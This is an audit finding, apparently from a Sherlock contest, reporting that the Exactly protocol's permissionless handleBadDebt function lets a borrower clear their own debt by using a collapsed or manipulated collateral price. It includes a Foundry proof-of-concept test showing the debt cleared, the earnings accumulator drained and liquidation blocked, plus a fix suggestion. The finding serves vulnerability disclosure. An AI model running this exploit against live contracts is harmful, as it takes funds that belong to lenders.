Fresh Jetblack Dragonfly

high

# Borrower can steal funds by triggering ClearBadDebt

## Summary
In exactly, users can borrow from a market at a fixed or floating rate(market A), and put up collateral via a different market which can be termed as the seize market(market B). If a users borrow position becomes valid for liquidation, then the liquidator can liquidate the position and seize collateral from market B. if the borrow position generates bad debt, then the bad debt is distributed as losses via being deducted from the earnings accumulator. the process of handling bad debt is triggered by the Market's liquidate function as can be seen below:

https://github.com/sherlock-audit/2024-04-interest-rate-model/blob/main/protocol/contracts/Market.sol#L609C1-L611C37



bad debt handling is passed to the auditor function which first checks whether the user has no collateral added across all markets he entered. if there is positive collateral, the function returns without clearing bad debt.  this is calculated as such:

https://github.com/sherlock-audit/2024-04-interest-rate-model/blob/main/protocol/contracts/Auditor.sol#L295C1-L320C4

As you can from function above, if all collateral in all markets is deemed not positive, then the auditor handledebt function attempts to clear bad debt in all the markets the user entered, and not only the market that triggered the liquidation event.

going back to the individual market, the clearBadDebt function triggered by the auditor contract essentially attempts to fully clear the users fixed and floating borrows(which are now deemed bad debt since initial trigger was via liquidation) using the earnings accumulated via the earningsAccumulator.

https://github.com/sherlock-audit/2024-04-interest-rate-model/blob/main/protocol/contracts/Market.sol#L639C1-L639C59

 
## Vulnerability Detail

The problem arises given that anyone can trigger the auditor's handleBadDebt function. so in theory the action of clearing bad debt can occur without a liquidation event. This is possible for instance if the price of the collateral asset collapses suddenly or is manipulated. A scenario can play out as such: 

1. price of seize collaterlal in Marktet B falls drastically(or is manipulated).
2. the handleBadDebt function is immediately called by malicious borrower in market A.
3. the check for 0 collateral passes because price is very low.
4. bad debt is cleared from Market A.
5. The borrowers fixed and/or floating borrow positions are cleared, but without having their borrowed assets seized.
6. Any future attempt to seize their borrowed assets via liquidation will fail since the borrowers position have been cleared by bad debt handling.

This is also exharberated by the fact that the handlebadDebt will clear bad debt from all markets the user entered, effectively clearing their borrowed positions from all markets, without any liquidation event.

## Impact

The borrower can effectively steal funds by utilizing the permissionless handleBadDebt function in the auditor to force the earnings accumulator to pay off their debt.

on a side note, it is also worth paying attention to the fact that the clearing of bad debt can be triggered even if the market operations are paused:

    https://github.com/sherlock-audit/2024-04-interest-rate-model/blob/main/protocol/contracts/Market.sol#L619C1-L619C53

notice there are no modifiers used by the clearBadDebt function. if the market operations (repaying, liquidation etc)were paused due to an emergency for instance, a bad actor can still clear bad debts.

## Code Snippet

        function testDistributeLosses() external {
    assetLINK.mint(ALICE, 50_000 ether);
    marketLINK.deposit(1.15 ether, address(this));
  
    market.deposit(50_000 ether, ALICE);
    market.setMaxFuturePools(12);

    // distribute earnings to accumulator
    market.setBackupFeeRate(1e18);

    irm = MockInterestRateModel(address(new MockBorrowRate(1e18)));
    market.setInterestRateModel(InterestRateModel(address(irm)));

    vm.prank(ALICE);
    market.borrowAtMaturity(FixedLib.INTERVAL, 10_000 ether, 20_000 ether, ALICE, ALICE);
    market.depositAtMaturity(FixedLib.INTERVAL, 10_000 ether, 10_000 ether, ALICE);

    irm.setRate(0);
    daiPriceFeed.setPrice(0.0002e18);
    for (uint256 i = 1; i <= 4; i++) {
      market.borrowAtMaturity(FixedLib.INTERVAL * i, 1_000 ether, 1_000 ether, address(this), address(this));
    }
    daiPriceFeed.setPrice(0.0003333333333333e18);
    linkPriceFeed.setPrice(1);

    uint256 accumulatorBefore = market.earningsAccumulator();
    uint256 DAIBalanceBefore = ERC20(market.asset()).balanceOf(address(this));
    // @audit trigger malicious handle bad debt
    auditor.handleBadDebt(address(this));
    uint256 bobDAIBalanceAfter = ERC20(market.asset()).balanceOf(BOB);
    uint256 accumulatorAfter = market.earningsAccumulator();
    (, uint256 fixedBorrows, ) = market.accounts(address(this));
    // @audit attacker fixed borrows have been cleared
    assertEq(fixedBorrows, 0);
    for (uint256 i = 1; i <= 4; i++) {
      (uint256 principal, uint256 fee) = market.fixedBorrowPositions(FixedLib.INTERVAL * i, address(this));
      assertEq(principal + fee, 0);
    }
    uint256 DAIBalanceAfter = ERC20(market.asset()).balanceOf(address(this));

    // @audit attacker still has his balance of assets in the market
    assertEq(DAIBalanceAfter, DAIBalanceBefore);

    // @audit earnings accumulator was used to pay off attackers debt
    assertLt(accumulatorAfter,accumulatorBefore);

    vm.expectRevert(InsufficientShortfall.selector);
    vm.prank(BOB);
    market.liquidate(address(this), type(uint256).max, marketLINK);

  }

The test above demonstrates the scenario explained.  please note that for this test, a new market called marketLINK, new link asset and priceFeed as well was created and used as mocks. as can be seen below:

     marketLINK = Market(address(new ERC1967Proxy(address(new Market(assetLINK, auditor)), "")));
    marketLINK.initialize(
      "LINK",
      3,
      1e18,
      InterestRateModel(address(irm)),
      0.02e18 / uint256(1 days),
      1e17,
      0,
      0.0046e18,
      0.42e18
    );
    vm.label(address(marketLINK), "MarketLINK");

    linkPriceFeed = new MockPriceFeed(18, 1e18);
    auditor.enableMarket(marketLINK, linkPriceFeed, 0.9e18);

    auditor.enterMarket(marketLINK);

    assetLINK.mint(BOB, 50_000 ether);
    //assetLINK.mint(ALICE, 50_000 ether);
    assetLINK.mint(address(this), 1_000_000 ether);

    assetLINK.approve(address(marketLINK), type(uint256).max);

## Tool used

Manual Review

## Recommendation

one suggestion is to add access control as to who can trigger the handleBadDebt function in the auditor, permission can be granted for instance to instances of markets and/or the Admin.